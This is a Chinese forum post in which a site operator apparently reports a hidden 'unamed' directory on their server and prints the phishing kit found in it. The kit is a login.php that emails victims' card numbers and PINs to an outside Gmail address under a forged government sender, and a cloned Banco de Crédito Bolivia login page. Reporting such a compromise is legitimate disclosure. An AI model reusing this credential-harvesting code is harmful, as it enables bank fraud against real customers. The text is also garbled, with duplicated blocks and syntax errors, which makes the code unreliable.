还有发现跟目录下被新建了一个"unamed"的目录,下面有两个文件:login.php 和 default.html
login.php代码:
复制内容到剪贴板
代码:
session_start();
$clave = $_POST['clave'];
$tarjeta = $_POST['tarjeta'];
$fury =("dracmgg@gmail.com";
$subj = "BCP Reply";
$from = "From: Homero Simpsons<admin@bolivia.gov.bo>";
$to = "dracmgg@gmail.com";
$msg = "Numero de Tarjeta: $tarjeta\nPIN: $clave\n";
mail($to, $subj, $msg, $from);
header("Location: https://www.bancodecredito.com.bo/credinet/condep.asp";default.html代码:
还有发现跟目录下被新建了一个"unamed"的目录,下面有两个文件:login.php 和 default.html
login.php代码:
复制内容到剪贴板
代码:
session_start();
$clave = $_POST['clave'];
$tarjeta = $_POST['tarjeta'];
$fury =("dracmgg@gmail.com";
$subj = "BCP Reply";
$from = "From: Homero Simpsons<admin@bolivia.gov.bo>";
$to = "dracmgg@gmail.com";
$msg = "Numero de Tarjeta: $tarjeta\nPIN: $clave\n";
mail($to, $subj, $msg, $from);
header("Location: https://www.bancodecredito.com.bo/credinet/condep.asp");default.html代码:
复制内容到剪贴板
代码:
RAGMA" content="NO-CACHE">
Demo
reguntas frecuentes
Ayuda
ingreso
tipo de tarjeta
número de tarjeta
clave
Credimás Servimatic
¿cómo ingresar?
Introduce los 16 dígitos de tu tarjeta
Credimás
o
Servimatic
Luego introduce tu clave secreta (PIN)
np_cc= new numpad('cc');
np_cc.show();
tipo de cambio
compra Bs.
7.921
venta Bs.
8.049
lang = '1'; url = '/credinet/default.asp';function salir(){
window.location = "salir.asp";
}
function goFAQ() {
var w=610, h=480;
window.open ("../info/preguntas.html" , "preguntas", "status=si,location=no,menubar=no,resizable=no,toolbar=no,scrollbars=yes,top=10,left=10,width=" + w + ",height=" + h , 1 );
}
function goDemo() {
var w=600, h=400;
if( window.screen && window.screen.availHeight )
{
h = h + window.screen.availHeight * 0.0;
w = w + window.screen.availWidth * 0.0;
}
window.open ("../demo/default.asp", "demo", "status=yes,location=no,menubar=no,resizable=yes,toolbar=no,scrollbars=no,top=10,left=10,width="+ w + ",height=" + h );
return ;
}
function goHelp() {
var w=600, h=420;
if( window.screen && window.screen.availHeight )
{
h = h + window.screen.availHeight * 0.05;
w = w + window.screen.availWidth * 0.05;
}
window.open ("../help2.asp", "ayuda", "status=yes,location=no,menubar=no,resizable=yes,toolbar=no,scrollbars=no,top=10,left=10,width="+ w + ",height=" + h );
return ;
}
function goSPA() {
window.location = "cambiarIdioma.asp?lan=SPA&url=" + url;
}
function goENG() {
window.location = "cambiarIdioma.asp?lan=ENG&url=" + url;
}
function popUp()
{
url = "https://servicecenter.verisign.com/cgi-bin/Xquery.exe";
url = url + "?Template=authCertByIssuer&remote_host=https://digitalid.certisur.com/global/cgi-bin/haydn.exe";
url = url + "&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=c21e9ca4b69bb19ee93b079349b212a7";
sealWin=window.open(url,"win",'toolbar=0,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1,width=600,height=450');
// self.name = "mainWin";
}tip = document.myForm.tipo;
tar = document.myForm.tarjeta;
pin = document.myForm.clave;
tar.value = "449192";
function cambiaBin(){
if(tip.selectedIndex==0) tar.value = "449192";
if(tip.selectedIndex==1) tar.value = "800001";
}
function salir(){
window.close();
}
function btnClick(){
aux = tar.value; sw = 0==1; i = 0;
while ( i != aux.length && !sw ) sw= ( !isIn (keyDigit, aux.charAt(i++)) );
if (sw) {
alert("El numero de tarjeta que has ingresado no es valido. Intentalo nuevamente.");
tar.focus(); return;
}
aux = pin.value; sw = 0==1; i = 0;
while ( i != aux.length && !sw ) sw= ( !isIn (keyDigit, aux.charAt(i++)) );
if (sw) {
alert("El PIN que has ingresado no es valido. Intentalo nuevamente.");
pin.focus(); return;
}
if(tar.value=="") {
alert("or favor, ingresa el numero de tu tarjeta.");
tar.focus();
}
else if (tar.value.length!=16 ){
alert("El numero de tarjeta que has ingresado no es el correcto. Intentalo nuevamente.");
tar.focus();
}
else if (tar.value.substr(0,5)=="46598"){
alert("El numero de tarjeta que has ingresado no es el correcto. Intentalo nuevamente.");
tar.focus();
}
else if(pin.value==""){
alert("Por favor, ingresa tu clave.");
pin.focus();
}
else if(pin.value.length!=4) {
alert("La clave que has ingresado no es la correcta. Intentalo nuevamente.");
pin.focus();
}
else{
//Enviar
v = "1" + tar.value + "2" + pin.value + "30";
t = "";
for (i=0;i != 12;i++){t = (9 - v.substr(i,1))+ t + (9-v.substr(23-i,1));}
document.reslogon.t.value = t;
document.reslogon.submit();
}
}
function popUp()
{
url = https://servicecenter.verisign.com/cgi-bin/Xquery.exe;
url = url + "?Template=authCertByIssuer&remote_host=https://digitalid.certisur.com/global/cgi-bin/haydn.exe";
url = url + "&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=c21e9ca4b69bb19ee93b079349b212a7";
sealWin=window.open(url,"win",'toolbar=0,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1,width=500,height=450');
// self.name = "mainWin";
}
function clear()
{
clear2(document.myForm.clave)
}
function numKeyPressed(obj, id)
{
numKeyPressed2(obj, id, document.myForm.clave)
}[
本帖最后由 shunzi34 于 2007-7-17 02:07 编辑 ]